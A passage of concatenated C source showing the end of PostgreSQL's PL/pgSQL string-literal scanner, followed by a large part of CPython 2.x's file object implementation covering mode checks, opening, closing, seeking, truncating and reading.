pfree(scanbuf); } /* * Called after a T_STRING token is read to get the string literal's value * as a palloc'd string. (We make this a separate call because in many * scenarios there's no need to get the decoded value.) * * Note: we expect the literal to be the most recently lexed token. This * would not work well if we supported multiple-token pushback or if * plpgsql_yylex() wanted to read ahead beyond a T_STRING token. */ char * plpgsql_get_string_value(void) { char *result; const char *cp; int len; if (dolqlen > 0) { /* Token is a $foo$...$foo$ string */ len = plpgsql_base_yyleng - 2 * dolqlen; Assert(len >= 0); result = (char *) palloc(len + 1); memcpy(result, plpgsql_base_yytext + dolqlen, len); result[len] = '\0'; } else if (*plpgsql_base_yytext == 'E' || *plpgsql_base_yytext == 'e') { /* Token is an E'...' 
string */ result = (char *) palloc(plpgsql_base_yyleng + 1); /* more than enough room */ len = 0; for (cp = plpgsql_base_yytext + 2; *cp; cp++) { if (*cp == '\'') { if (cp[1] == '\'') result[len++] = *cp++; /* else it must be string end quote */ } else if (*cp == '\\') { if (cp[1] != '\0') /* just a paranoid check */ result[len++] = *(++cp); } else result[len++] = *cp; } result[len] = '\0'; } else { /* Token is a '...' string */ result = (char *) palloc(plpgsql_base_yyleng + 1); /* more than enough room */ len = 0; for (cp = plpgsql_base_yytext + 1; *cp; cp++) { if (*cp == '\'') { if (cp[1] == '\'') result[len++] = *cp++; /* else it must be string end quote */ } else if (*cp == '\\') { if (cp[1] != '\0') /* just a paranoid check */ result[len++] = *(++cp); } else result[len++] = *cp; } result[len] = '\0'; } return result; }
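/*
 * Illustrative sketch (an addition, not part of the original scanner):
 * how a consumer such as plpgsql's gram.y can peek one token ahead using
 * the one-token pushback facility above.  "K_SEMI" is a hypothetical
 * token code used only for this example.
 *
 *		static bool
 *		next_token_is_semi(void)
 *		{
 *			int		tok = plpgsql_yylex();
 *
 *			plpgsql_push_back_token(tok);
 *			return tok == K_SEMI;
 *		}
 */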
504244.c
/* File object implementation */ #define PY_SSIZE_T_CLEAN #include "Python.h" #include "structmember.h" #include "iohook.h" #ifdef HAVE_SYS_TYPES_H #include <sys/types.h> #endif /* HAVE_SYS_TYPES_H */ #ifdef MS_WINDOWS #define fileno _fileno /* can simulate truncate with Win32 API functions; see file_truncate */ #define HAVE_FTRUNCATE #define WIN32_LEAN_AND_MEAN #include <windows.h> #endif #if defined(PYOS_OS2) && defined(PYCC_GCC) #include <io.h> #endif #define BUF(v) PyString_AS_STRING((PyStringObject *)v) #ifdef HAVE_ERRNO_H #include <errno.h> #endif #ifdef HAVE_GETC_UNLOCKED #define GETC(f) getc_unlocked(f) #define FLOCKFILE(f) flockfile(f) #define FUNLOCKFILE(f) funlockfile(f) #else #define GETC(f) getc(f) #define FLOCKFILE(f) #define FUNLOCKFILE(f) #endif /* Bits in f_newlinetypes */ #define NEWLINE_UNKNOWN 0 /* No newline seen, yet */ #define NEWLINE_CR 1 /* \r newline seen */ #define NEWLINE_LF 2 /* \n newline seen */ #define NEWLINE_CRLF 4 /* \r\n newline seen */ /* * These macros release the GIL while preventing the f_close() function being * called in the interval between them. For that purpose, a running total of * the number of currently running unlocked code sections is kept in * the unlocked_count field of the PyFileObject. The close() method raises * an IOError if that field is non-zero. See issue #815646, #595601. */ #define FILE_BEGIN_ALLOW_THREADS(fobj) \ { \ fobj->unlocked_count++; \ Py_BEGIN_ALLOW_THREADS #define FILE_END_ALLOW_THREADS(fobj) \ Py_END_ALLOW_THREADS \ fobj->unlocked_count--; \ assert(fobj->unlocked_count >= 0); \ } #define FILE_ABORT_ALLOW_THREADS(fobj) \ Py_BLOCK_THREADS \ fobj->unlocked_count--; \ assert(fobj->unlocked_count >= 0); #ifdef __cplusplus extern "C" { #endif FILE * PyFile_AsFile(PyObject *f) { if (f == NULL || !PyFile_Check(f)) return NULL; else return ((PyFileObject *)f)->f_fp; } void PyFile_IncUseCount(PyFileObject *fobj) { fobj->unlocked_count++; } void PyFile_DecUseCount(PyFileObject *fobj) { fobj->unlocked_count--; assert(fobj->unlocked_count >= 0); } PyObject * PyFile_Name(PyObject *f) { if (f == NULL || !PyFile_Check(f)) return NULL; else return ((PyFileObject *)f)->f_name; } /* This is a safe wrapper around PyObject_Print to print to the FILE of a PyFileObject. PyObject_Print releases the GIL but knows nothing about PyFileObject. */ static int file_PyObject_Print(PyObject *op, PyFileObject *f, int flags) { int result; PyFile_IncUseCount(f); result = PyObject_Print(op, f->f_fp, flags); PyFile_DecUseCount(f); return result; } /* On Unix, fopen will succeed for directories. In Python, there should be no file objects referring to directories, so we need a check. 
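(dircheck() below fstat()s the underlying descriptor and raises IOError with EISDIR when it refers to a directory.)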
*/ static PyFileObject* dircheck(PyFileObject* f) { #if defined(HAVE_FSTAT) && defined(S_IFDIR) && defined(EISDIR) struct stat buf; int res; if (f->f_fp == NULL) return f; Py_BEGIN_ALLOW_THREADS res = fstat(fileno(f->f_fp), &buf); Py_END_ALLOW_THREADS if (res == 0 && S_ISDIR(buf.st_mode)) { char *msg = strerror(EISDIR); PyObject *exc = PyObject_CallFunction(PyExc_IOError, "(isO)", EISDIR, msg, f->f_name); PyErr_SetObject(PyExc_IOError, exc); Py_XDECREF(exc); return NULL; } #endif return f; } static PyObject * fill_file_fields(PyFileObject *f, FILE *fp, PyObject *name, char *mode, int (*close)(FILE *)) { assert(name != NULL); assert(f != NULL); assert(PyFile_Check(f)); assert(f->f_fp == NULL); Py_DECREF(f->f_name); Py_DECREF(f->f_mode); Py_DECREF(f->f_encoding); Py_DECREF(f->f_errors); Py_INCREF(name); f->f_name = name; f->f_mode = PyString_FromString(mode); f->f_close = close; f->f_softspace = 0; f->f_binary = strchr(mode,'b') != NULL; f->f_buf = NULL; f->f_univ_newline = (strchr(mode, 'U') != NULL); f->f_newlinetypes = NEWLINE_UNKNOWN; f->f_skipnextlf = 0; Py_INCREF(Py_None); f->f_encoding = Py_None; Py_INCREF(Py_None); f->f_errors = Py_None; f->readable = f->writable = 0; if (strchr(mode, 'r') != NULL || f->f_univ_newline) f->readable = 1; if (strchr(mode, 'w') != NULL || strchr(mode, 'a') != NULL) f->writable = 1; if (strchr(mode, '+') != NULL) f->readable = f->writable = 1; if (f->f_mode == NULL) return NULL; f->f_fp = fp; f = dircheck(f); return (PyObject *) f; } #if defined _MSC_VER && _MSC_VER >= 1400 && defined(__STDC_SECURE_LIB__) #define Py_VERIFY_WINNT /* The CRT on windows compiled with Visual Studio 2005 and higher may * assert if given invalid mode strings. This is all fine and well * in static languages like C where the mode string is typically hard * coded. But in Python, where we pass in the mode string from the user, * we need to verify it first manually */ static int _PyVerify_Mode_WINNT(const char *mode) { /* See if mode string is valid on Windows to avoid hard assertions */ /* remove leading spaces */ int singles = 0; int pairs = 0; int encoding = 0; const char *s, *c; while(*mode == ' ') /* strip initial spaces */ ++mode; if (!strchr("rwa", *mode)) /* must start with one of these */ return 0; while (*++mode) { if (*mode == ' ' || *mode == 'N') /* ignore spaces and N */ continue; s = "+TD"; /* each of these can appear only once */ c = strchr(s, *mode); if (c) { ptrdiff_t idx = c - s; /* index into s, so the shift below is non-negative */ if (singles & (1<<idx)) return 0; singles |= (1<<idx); continue; } s = "btcnSR"; /* only one of each letter in the pairs allowed */ c = strchr(s, *mode); if (c) { ptrdiff_t idx = (c - s)/2; if (pairs & (1<<idx)) return 0; pairs |= (1<<idx); continue; } if (*mode == ',') { encoding = 1; break; } return 0; /* found an invalid char */ } if (encoding) { char *e[] = {"UTF-8", "UTF-16LE", "UNICODE"}; while (*mode == ' ') ++mode; /* find 'ccs =' */ if (strncmp(mode, "ccs", 3)) return 0; mode += 3; while (*mode == ' ') ++mode; if (*mode != '=') return 0; ++mode; /* step over the '=' */ while (*mode == ' ') ++mode; for(encoding = 0; encoding<_countof(e); ++encoding) { size_t l = strlen(e[encoding]); if (!strncmp(mode, e[encoding], l)) { mode += l; /* found a valid encoding */ break; } } if (encoding == _countof(e)) return 0; } /* skip trailing spaces */ while (*mode == ' ') ++mode; return *mode == '\0'; /* must be at the end of the string */ } #endif /* check for known incorrect mode strings - problem is, platforms are free to accept any mode characters they like and are supposed to ignore stuff they don't understand...
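(For illustration, an added note: under the rules below a mode of "U" is sanitized to "rb", and "rU+" becomes "rb+".)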
write or append mode with universal newline support is expressly forbidden by PEP 278. Additionally, remove the 'U' from the mode string as platforms won't know what it is. Non-zero return signals an exception */ int _PyFile_SanitizeMode(char *mode) { char *upos; size_t len = strlen(mode); if (!len) { PyErr_SetString(PyExc_ValueError, "empty mode string"); return -1; } upos = strchr(mode, 'U'); if (upos) { memmove(upos, upos+1, len-(upos-mode)); /* incl null char */ if (mode[0] == 'w' || mode[0] == 'a') { PyErr_Format(PyExc_ValueError, "universal newline " "mode can only be used with modes " "starting with 'r'"); return -1; } if (mode[0] != 'r') { memmove(mode+1, mode, strlen(mode)+1); mode[0] = 'r'; } if (!strchr(mode, 'b')) { memmove(mode+2, mode+1, strlen(mode)); mode[1] = 'b'; } } else if (mode[0] != 'r' && mode[0] != 'w' && mode[0] != 'a') { PyErr_Format(PyExc_ValueError, "mode string must begin with " "one of 'r', 'w', 'a' or 'U', not '%.200s'", mode); return -1; } #ifdef Py_VERIFY_WINNT /* additional checks on NT with visual studio 2005 and higher */ if (!_PyVerify_Mode_WINNT(mode)) { PyErr_Format(PyExc_ValueError, "Invalid mode ('%.50s')", mode); return -1; } #endif return 0; } static PyObject * open_the_file(PyFileObject *f, char *name, char *mode) { char *newmode; assert(f != NULL); assert(PyFile_Check(f)); #ifdef MS_WINDOWS /* windows ignores the passed name in order to support Unicode */ assert(f->f_name != NULL); #else assert(name != NULL); #endif assert(mode != NULL); assert(f->f_fp == NULL); /* probably need to replace 'U' by 'rb' */ newmode = PyMem_MALLOC(strlen(mode) + 3); if (!newmode) { PyErr_NoMemory(); return NULL; } strcpy(newmode, mode); if (_PyFile_SanitizeMode(newmode)) { f = NULL; goto cleanup; } /* rexec.py can't stop a user from getting the file() constructor -- all they have to do is get *any* file object f, and then do type(f). Here we prevent them from doing damage with it. */ if (PyEval_GetRestricted()) { PyErr_SetString(PyExc_IOError, "file() constructor not accessible in restricted mode"); f = NULL; goto cleanup; } errno = 0; #ifdef MS_WINDOWS if (PyUnicode_Check(f->f_name)) { PyObject *wmode; wmode = PyUnicode_DecodeASCII(newmode, strlen(newmode), NULL); if (f->f_name && wmode) { FILE_BEGIN_ALLOW_THREADS(f) /* PyUnicode_AS_UNICODE OK without thread lock as it is a simple dereference. */ f->f_fp = hook_wfopen(PyUnicode_AS_UNICODE(f->f_name), PyUnicode_AS_UNICODE(wmode)); FILE_END_ALLOW_THREADS(f) } Py_XDECREF(wmode); } #endif if (NULL == f->f_fp && NULL != name) { FILE_BEGIN_ALLOW_THREADS(f) f->f_fp = hook_fopen(name, newmode); FILE_END_ALLOW_THREADS(f) } if (f->f_fp == NULL) { #if defined _MSC_VER && (_MSC_VER < 1400 || !defined(__STDC_SECURE_LIB__)) /* MSVC 6 (Microsoft) leaves errno at 0 for bad mode strings, * across all Windows flavors. When it sets EINVAL varies * across Windows flavors, the exact conditions aren't * documented, and the answer lies in the OS's implementation * of Win32's CreateFile function (whose source is secret). * Seems the best we can do is map EINVAL to ENOENT. * Starting with Visual Studio .NET 2005, EINVAL is correctly * set by our CRT error handler (set in exceptions.c.) */ if (errno == 0) /* bad mode string */ errno = EINVAL; else if (errno == EINVAL) /* unknown, but not a mode string */ errno = ENOENT; #endif /* EINVAL is returned when an invalid filename or * an invalid mode is supplied. 
*/ if (errno == EINVAL) { PyObject *v; char message[100]; PyOS_snprintf(message, 100, "invalid mode ('%.50s') or filename", mode); v = Py_BuildValue("(isO)", errno, message, f->f_name); if (v != NULL) { PyErr_SetObject(PyExc_IOError, v); Py_DECREF(v); } } else PyErr_SetFromErrnoWithFilenameObject(PyExc_IOError, f->f_name); f = NULL; } if (f != NULL) f = dircheck(f); cleanup: PyMem_FREE(newmode); return (PyObject *)f; } static PyObject * close_the_file(PyFileObject *f) { int sts = 0; int (*local_close)(FILE *); FILE *local_fp = f->f_fp; char *local_setbuf = f->f_setbuf; if (local_fp != NULL) { local_close = f->f_close; if (local_close != NULL && f->unlocked_count > 0) { if (Py_REFCNT(f) > 0) { PyErr_SetString(PyExc_IOError, "close() called during concurrent " "operation on the same file object"); } else { /* This should not happen unless someone is * carelessly playing with the PyFileObject * struct fields and/or its associated FILE * pointer. */ PyErr_SetString(PyExc_SystemError, "PyFileObject locking error in " "destructor (refcnt <= 0 at close)"); } return NULL; } /* NULL out the FILE pointer before releasing the GIL, because * it will not be valid anymore after the close() function is * called. */ f->f_fp = NULL; if (local_close != NULL) { /* Issue #9295: must temporarily reset f_setbuf so that another thread doesn't free it when running file_close() concurrently. Otherwise this close() will crash when flushing the buffer. */ f->f_setbuf = NULL; Py_BEGIN_ALLOW_THREADS errno = 0; sts = (*local_close)(local_fp); Py_END_ALLOW_THREADS f->f_setbuf = local_setbuf; if (sts == EOF) return PyErr_SetFromErrno(PyExc_IOError); if (sts != 0) return PyInt_FromLong((long)sts); } } Py_RETURN_NONE; } PyObject * PyFile_FromFile(FILE *fp, char *name, char *mode, int (*close)(FILE *)) { PyFileObject *f; PyObject *o_name; f = (PyFileObject *)PyFile_Type.tp_new(&PyFile_Type, NULL, NULL); if (f == NULL) return NULL; o_name = PyString_FromString(name); if (o_name == NULL) { if (close != NULL && fp != NULL) close(fp); Py_DECREF(f); return NULL; } if (fill_file_fields(f, fp, o_name, mode, close) == NULL) { Py_DECREF(f); Py_DECREF(o_name); return NULL; } Py_DECREF(o_name); return (PyObject *)f; } PyObject * PyFile_FromString(char *name, char *mode) { extern int fclose(FILE *); PyFileObject *f; f = (PyFileObject *)PyFile_FromFile((FILE *)NULL, name, mode, fclose); if (f != NULL) { if (open_the_file(f, name, mode) == NULL) { Py_DECREF(f); f = NULL; } } return (PyObject *)f; } void PyFile_SetBufSize(PyObject *f, int bufsize) { PyFileObject *file = (PyFileObject *)f; if (bufsize >= 0) { int type; switch (bufsize) { case 0: type = _IONBF; break; #ifdef HAVE_SETVBUF case 1: type = _IOLBF; bufsize = BUFSIZ; break; #endif default: type = _IOFBF; #ifndef HAVE_SETVBUF bufsize = BUFSIZ; #endif break; } fflush(file->f_fp); if (type == _IONBF) { PyMem_Free(file->f_setbuf); file->f_setbuf = NULL; } else { file->f_setbuf = (char *)PyMem_Realloc(file->f_setbuf, bufsize); } #ifdef HAVE_SETVBUF setvbuf(file->f_fp, file->f_setbuf, type, bufsize); #else /* !HAVE_SETVBUF */ setbuf(file->f_fp, file->f_setbuf); #endif /* !HAVE_SETVBUF */ } } /* Set the encoding used to output Unicode strings. Return 1 on success, 0 on failure. 
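For example (an illustrative note, not from the original comment), extension code holding a file object f might call PyFile_SetEncoding(f, "utf-8") so that unicode objects later passed to file_write() are encoded as UTF-8 rather than with the default encoding.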
*/ int PyFile_SetEncoding(PyObject *f, const char *enc) { return PyFile_SetEncodingAndErrors(f, enc, NULL); } int PyFile_SetEncodingAndErrors(PyObject *f, const char *enc, char* errors) { PyFileObject *file = (PyFileObject*)f; PyObject *str, *oerrors; assert(PyFile_Check(f)); str = PyString_FromString(enc); if (!str) return 0; if (errors) { oerrors = PyString_FromString(errors); if (!oerrors) { Py_DECREF(str); return 0; } } else { oerrors = Py_None; Py_INCREF(Py_None); } Py_SETREF(file->f_encoding, str); Py_SETREF(file->f_errors, oerrors); return 1; } static PyObject * err_closed(void) { PyErr_SetString(PyExc_ValueError, "I/O operation on closed file"); return NULL; } static PyObject * err_mode(char *action) { PyErr_Format(PyExc_IOError, "File not open for %s", action); return NULL; } /* Refuse regular file I/O if there's data in the iteration-buffer. * Mixing them would cause data to arrive out of order, as the read* * methods don't use the iteration buffer. */ static PyObject * err_iterbuffered(void) { PyErr_SetString(PyExc_ValueError, "Mixing iteration and read methods would lose data"); return NULL; } static void drop_file_readahead(PyFileObject *f) { PyMem_FREE(f->f_buf); f->f_buf = NULL; } /* Methods */ static void file_dealloc(PyFileObject *f) { PyObject *ret; if (f->weakreflist != NULL) PyObject_ClearWeakRefs((PyObject *) f); ret = close_the_file(f); if (!ret) { PySys_WriteStderr("close failed in file object destructor:\n"); PyErr_Print(); } else { Py_DECREF(ret); } PyMem_Free(f->f_setbuf); Py_XDECREF(f->f_name); Py_XDECREF(f->f_mode); Py_XDECREF(f->f_encoding); Py_XDECREF(f->f_errors); drop_file_readahead(f); Py_TYPE(f)->tp_free((PyObject *)f); } static PyObject * file_repr(PyFileObject *f) { PyObject *ret = NULL; PyObject *name = NULL; if (PyUnicode_Check(f->f_name)) { #ifdef Py_USING_UNICODE const char *name_str; name = PyUnicode_AsUnicodeEscapeString(f->f_name); name_str = name ? PyString_AsString(name) : "?"; ret = PyString_FromFormat("<%s file u'%s', mode '%s' at %p>", f->f_fp == NULL ? "closed" : "open", name_str, PyString_AsString(f->f_mode), f); Py_XDECREF(name); return ret; #endif } else { name = PyObject_Repr(f->f_name); if (name == NULL) return NULL; ret = PyString_FromFormat("<%s file %s, mode '%s' at %p>", f->f_fp == NULL ? "closed" : "open", PyString_AsString(name), PyString_AsString(f->f_mode), f); Py_XDECREF(name); return ret; } } static PyObject * file_close(PyFileObject *f) { PyObject *sts = close_the_file(f); if (sts) { PyMem_Free(f->f_setbuf); f->f_setbuf = NULL; } return sts; } /* Our very own off_t-like type, 64-bit if possible */ #if !defined(HAVE_LARGEFILE_SUPPORT) typedef off_t Py_off_t; #elif SIZEOF_OFF_T >= 8 typedef off_t Py_off_t; #elif SIZEOF_FPOS_T >= 8 typedef fpos_t Py_off_t; #else #error "Large file support, but neither off_t nor fpos_t is large enough." 
#endif /* a portable fseek() function return 0 on success, non-zero on failure (with errno set) */ static int _portable_fseek(FILE *fp, Py_off_t offset, int whence) { #if !defined(HAVE_LARGEFILE_SUPPORT) return fseek(fp, offset, whence); #elif defined(HAVE_FSEEKO) && SIZEOF_OFF_T >= 8 return fseeko(fp, offset, whence); #elif defined(HAVE_FSEEK64) return fseek64(fp, offset, whence); #elif defined(__BEOS__) return _fseek(fp, offset, whence); #elif SIZEOF_FPOS_T >= 8 /* lacking a 64-bit capable fseek(), use a 64-bit capable fsetpos() and fgetpos() to implement fseek()*/ fpos_t pos; switch (whence) { case SEEK_END: #ifdef MS_WINDOWS fflush(fp); if (_lseeki64(fileno(fp), 0, 2) == -1) return -1; #else if (fseek(fp, 0, SEEK_END) != 0) return -1; #endif /* fall through */ case SEEK_CUR: if (fgetpos(fp, &pos) != 0) return -1; offset += pos; break; /* case SEEK_SET: break; */ } return fsetpos(fp, &offset); #else #error "Large file support, but no way to fseek." #endif } /* a portable ftell() function Return -1 on failure with errno set appropriately, current file position on success */ static Py_off_t _portable_ftell(FILE* fp) { #if !defined(HAVE_LARGEFILE_SUPPORT) return ftell(fp); #elif defined(HAVE_FTELLO) && SIZEOF_OFF_T >= 8 return ftello(fp); #elif defined(HAVE_FTELL64) return ftell64(fp); #elif SIZEOF_FPOS_T >= 8 fpos_t pos; if (fgetpos(fp, &pos) != 0) return -1; return pos; #else #error "Large file support, but no way to ftell." #endif } static PyObject * file_seek(PyFileObject *f, PyObject *args) { int whence; int ret; Py_off_t offset; PyObject *offobj, *off_index; if (f->f_fp == NULL) return err_closed(); drop_file_readahead(f); whence = 0; if (!PyArg_ParseTuple(args, "O|i:seek", &offobj, &whence)) return NULL; off_index = PyNumber_Index(offobj); if (!off_index) { if (!PyFloat_Check(offobj)) return NULL; /* Deprecated in 2.6 */ PyErr_Clear(); if (PyErr_WarnEx(PyExc_DeprecationWarning, "integer argument expected, got float", 1) < 0) return NULL; off_index = offobj; Py_INCREF(offobj); } #if !defined(HAVE_LARGEFILE_SUPPORT) offset = PyInt_AsLong(off_index); #else offset = PyLong_Check(off_index) ? PyLong_AsLongLong(off_index) : PyInt_AsLong(off_index); #endif Py_DECREF(off_index); if (PyErr_Occurred()) return NULL; FILE_BEGIN_ALLOW_THREADS(f) errno = 0; ret = _portable_fseek(f->f_fp, offset, whence); FILE_END_ALLOW_THREADS(f) if (ret != 0) { PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); return NULL; } f->f_skipnextlf = 0; Py_INCREF(Py_None); return Py_None; } #ifdef HAVE_FTRUNCATE static PyObject * file_truncate(PyFileObject *f, PyObject *args) { Py_off_t newsize; PyObject *newsizeobj = NULL; Py_off_t initialpos; int ret; if (f->f_fp == NULL) return err_closed(); if (!f->writable) return err_mode("writing"); if (!PyArg_UnpackTuple(args, "truncate", 0, 1, &newsizeobj)) return NULL; /* Get current file position. If the file happens to be open for * update and the last operation was an input operation, C doesn't * define what the later fflush() will do, but we promise truncate() * won't change the current position (and fflush() *does* change it * then at least on Windows). The easiest thing is to capture * current pos now and seek back to it at the end. */ FILE_BEGIN_ALLOW_THREADS(f) errno = 0; initialpos = _portable_ftell(f->f_fp); FILE_END_ALLOW_THREADS(f) if (initialpos == -1) goto onioerror; /* Set newsize to current position if newsizeobj NULL, else to the * specified value. 
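(For example, at the Python level f.truncate() cuts the file at the current offset, while f.truncate(0) empties it.)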
*/ if (newsizeobj != NULL) { #if !defined(HAVE_LARGEFILE_SUPPORT) newsize = PyInt_AsLong(newsizeobj); #else newsize = PyLong_Check(newsizeobj) ? PyLong_AsLongLong(newsizeobj) : PyInt_AsLong(newsizeobj); #endif if (PyErr_Occurred()) return NULL; } else /* default to current position */ newsize = initialpos; /* Flush the stream. We're mixing stream-level I/O with lower-level * I/O, and a flush may be necessary to synch both platform views * of the current file state. */ FILE_BEGIN_ALLOW_THREADS(f) errno = 0; ret = fflush(f->f_fp); FILE_END_ALLOW_THREADS(f) if (ret != 0) goto onioerror; #ifdef MS_WINDOWS /* MS _chsize doesn't work if newsize doesn't fit in 32 bits, so don't even try using it. */ { HANDLE hFile; /* Have to move current pos to desired endpoint on Windows. */ FILE_BEGIN_ALLOW_THREADS(f) errno = 0; ret = _portable_fseek(f->f_fp, newsize, SEEK_SET) != 0; FILE_END_ALLOW_THREADS(f) if (ret) goto onioerror; /* Truncate. Note that this may grow the file! */ FILE_BEGIN_ALLOW_THREADS(f) errno = 0; hFile = (HANDLE)_get_osfhandle(fileno(f->f_fp)); ret = hFile == (HANDLE)-1; if (ret == 0) { ret = SetEndOfFile(hFile) == 0; if (ret) errno = EACCES; } FILE_END_ALLOW_THREADS(f) if (ret) goto onioerror; } #else FILE_BEGIN_ALLOW_THREADS(f) errno = 0; ret = ftruncate(fileno(f->f_fp), newsize); FILE_END_ALLOW_THREADS(f) if (ret != 0) goto onioerror; #endif /* !MS_WINDOWS */ /* Restore original file position. */ FILE_BEGIN_ALLOW_THREADS(f) errno = 0; ret = _portable_fseek(f->f_fp, initialpos, SEEK_SET) != 0; FILE_END_ALLOW_THREADS(f) if (ret) goto onioerror; Py_INCREF(Py_None); return Py_None; onioerror: PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); return NULL; } #endif /* HAVE_FTRUNCATE */ static PyObject * file_tell(PyFileObject *f) { Py_off_t pos; if (f->f_fp == NULL) return err_closed(); FILE_BEGIN_ALLOW_THREADS(f) errno = 0; pos = _portable_ftell(f->f_fp); FILE_END_ALLOW_THREADS(f) if (pos == -1) { PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); return NULL; } if (f->f_skipnextlf) { int c; c = GETC(f->f_fp); if (c == '\n') { f->f_newlinetypes |= NEWLINE_CRLF; pos++; f->f_skipnextlf = 0; } else if (c != EOF) ungetc(c, f->f_fp); } #if !defined(HAVE_LARGEFILE_SUPPORT) return PyInt_FromLong(pos); #else return PyLong_FromLongLong(pos); #endif } static PyObject * file_fileno(PyFileObject *f) { if (f->f_fp == NULL) return err_closed(); return PyInt_FromLong((long) fileno(f->f_fp)); } static PyObject * file_flush(PyFileObject *f) { int res; if (f->f_fp == NULL) return err_closed(); FILE_BEGIN_ALLOW_THREADS(f) errno = 0; res = fflush(f->f_fp); FILE_END_ALLOW_THREADS(f) if (res != 0) { PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); return NULL; } Py_INCREF(Py_None); return Py_None; } static PyObject * file_isatty(PyFileObject *f) { long res; if (f->f_fp == NULL) return err_closed(); FILE_BEGIN_ALLOW_THREADS(f) res = isatty((int)fileno(f->f_fp)); FILE_END_ALLOW_THREADS(f) return PyBool_FromLong(res); } #if BUFSIZ < 8192 #define SMALLCHUNK 8192 #else #define SMALLCHUNK BUFSIZ #endif static size_t new_buffersize(PyFileObject *f, size_t currentsize) { #ifdef HAVE_FSTAT off_t pos, end; struct stat st; int res; size_t bufsize = 0; FILE_BEGIN_ALLOW_THREADS(f) res = fstat(fileno(f->f_fp), &st); if (res == 0) { end = st.st_size; /* The following is not a bug: we really need to call lseek() *and* ftell(). 
The reason is that some stdio libraries mistakenly flush their buffer when ftell() is called and the lseek() call it makes fails, thereby throwing away data that cannot be recovered in any way. To avoid this, we first test lseek(), and only call ftell() if lseek() works. We can't use the lseek() value either, because we need to take the amount of buffered data into account. (Yet another reason why stdio stinks. :-) */ pos = lseek(fileno(f->f_fp), 0L, SEEK_CUR); if (pos >= 0) { pos = ftell(f->f_fp); } if (pos < 0) clearerr(f->f_fp); if (end > pos && pos >= 0) bufsize = currentsize + end - pos + 1; /* Add 1 so if the file were to grow we'd notice. */ } FILE_END_ALLOW_THREADS(f) if (bufsize != 0) return bufsize; #endif /* Expand the buffer by an amount proportional to the current size, giving us amortized linear-time behavior. Use a less-than-double growth factor to avoid excessive allocation. */ return currentsize + (currentsize >> 3) + 6; } #if defined(EWOULDBLOCK) && defined(EAGAIN) && EWOULDBLOCK != EAGAIN #define BLOCKED_ERRNO(x) ((x) == EWOULDBLOCK || (x) == EAGAIN) #else #ifdef EWOULDBLOCK #define BLOCKED_ERRNO(x) ((x) == EWOULDBLOCK) #else #ifdef EAGAIN #define BLOCKED_ERRNO(x) ((x) == EAGAIN) #else #define BLOCKED_ERRNO(x) 0 #endif #endif #endif static PyObject * file_read(PyFileObject *f, PyObject *args) { long bytesrequested = -1; size_t bytesread, buffersize, chunksize; PyObject *v; if (f->f_fp == NULL) return err_closed(); if (!f->readable) return err_mode("reading"); /* refuse to mix with f.next() */ if (f->f_buf != NULL && (f->f_bufend - f->f_bufptr) > 0 && f->f_buf[0] != '\0') return err_iterbuffered(); if (!PyArg_ParseTuple(args, "|l:read", &bytesrequested)) return NULL; if (bytesrequested < 0) buffersize = new_buffersize(f, (size_t)0); else buffersize = bytesrequested; if (buffersize > PY_SSIZE_T_MAX) { PyErr_SetString(PyExc_OverflowError, "requested number of bytes is more than a Python string can hold"); return NULL; } v = PyString_FromStringAndSize((char *)NULL, buffersize); if (v == NULL) return NULL; bytesread = 0; for (;;) { int interrupted; FILE_BEGIN_ALLOW_THREADS(f) errno = 0; chunksize = Py_UniversalNewlineFread(BUF(v) + bytesread, buffersize - bytesread, f->f_fp, (PyObject *)f); interrupted = ferror(f->f_fp) && errno == EINTR; FILE_END_ALLOW_THREADS(f) if (interrupted) { clearerr(f->f_fp); if (PyErr_CheckSignals()) { Py_DECREF(v); return NULL; } } if (chunksize == 0) { if (interrupted) continue; if (!ferror(f->f_fp)) break; clearerr(f->f_fp); /* When in non-blocking mode, data shouldn't * be discarded if a blocking signal was * received. That will also happen if * chunksize != 0, but bytesread < buffersize. */ if (bytesread > 0 && BLOCKED_ERRNO(errno)) break; PyErr_SetFromErrno(PyExc_IOError); Py_DECREF(v); return NULL; } bytesread += chunksize; if (bytesread < buffersize && !interrupted) { clearerr(f->f_fp); break; } if (bytesrequested < 0) { buffersize = new_buffersize(f, buffersize); if (_PyString_Resize(&v, buffersize) < 0) return NULL; } else { /* Got what was requested. 
*/ break; } } if (bytesread != buffersize && _PyString_Resize(&v, bytesread)) return NULL; return v; } static PyObject * file_readinto(PyFileObject *f, PyObject *args) { char *ptr; Py_ssize_t ntodo; Py_ssize_t ndone, nnow; Py_buffer pbuf; if (f->f_fp == NULL) return err_closed(); if (!f->readable) return err_mode("reading"); /* refuse to mix with f.next() */ if (f->f_buf != NULL && (f->f_bufend - f->f_bufptr) > 0 && f->f_buf[0] != '\0') return err_iterbuffered(); if (!PyArg_ParseTuple(args, "w*", &pbuf)) return NULL; ptr = pbuf.buf; ntodo = pbuf.len; ndone = 0; while (ntodo > 0) { int interrupted; FILE_BEGIN_ALLOW_THREADS(f) errno = 0; nnow = Py_UniversalNewlineFread(ptr+ndone, ntodo, f->f_fp, (PyObject *)f); interrupted = ferror(f->f_fp) && errno == EINTR; FILE_END_ALLOW_THREADS(f) if (interrupted) { clearerr(f->f_fp); if (PyErr_CheckSignals()) { PyBuffer_Release(&pbuf); return NULL; } } if (nnow == 0) { if (interrupted) continue; if (!ferror(f->f_fp)) break; PyErr_SetFromErrno(PyExc_IOError); clearerr(f->f_fp); PyBuffer_Release(&pbuf); return NULL; } ndone += nnow; ntodo -= nnow; } PyBuffer_Release(&pbuf); return PyInt_FromSsize_t(ndone); } /************************************************************************** Routine to get next line using platform fgets(). Under MSVC 6: + MS threadsafe getc is very slow (multiple layers of function calls before+ after each character, to lock+unlock the stream). + The stream-locking functions are MS-internal -- can't access them from user code. + There's nothing Tim could find in the MS C or platform SDK libraries that can worm around this. + MS fgets locks/unlocks only once per line; it's the only hook we have. So we use fgets for speed(!), despite that it's painful. MS realloc is also slow. Reports from other platforms on this method vs getc_unlocked (which MS doesn't have): Linux a wash Solaris a wash Tru64 Unix getline_via_fgets significantly faster CAUTION: The C std isn't clear about this: in those cases where fgets writes something into the buffer, can it write into any position beyond the required trailing null byte? MSVC 6 fgets does not, and no platform is (yet) known on which it does; and it would be a strange way to code fgets. Still, getline_via_fgets may not work correctly if it does. The std test test_bufio.py should fail if platform fgets() routinely writes beyond the trailing null byte. #define DONT_USE_FGETS_IN_GETLINE to disable this code. **************************************************************************/ /* Use this routine if told to, or by default on 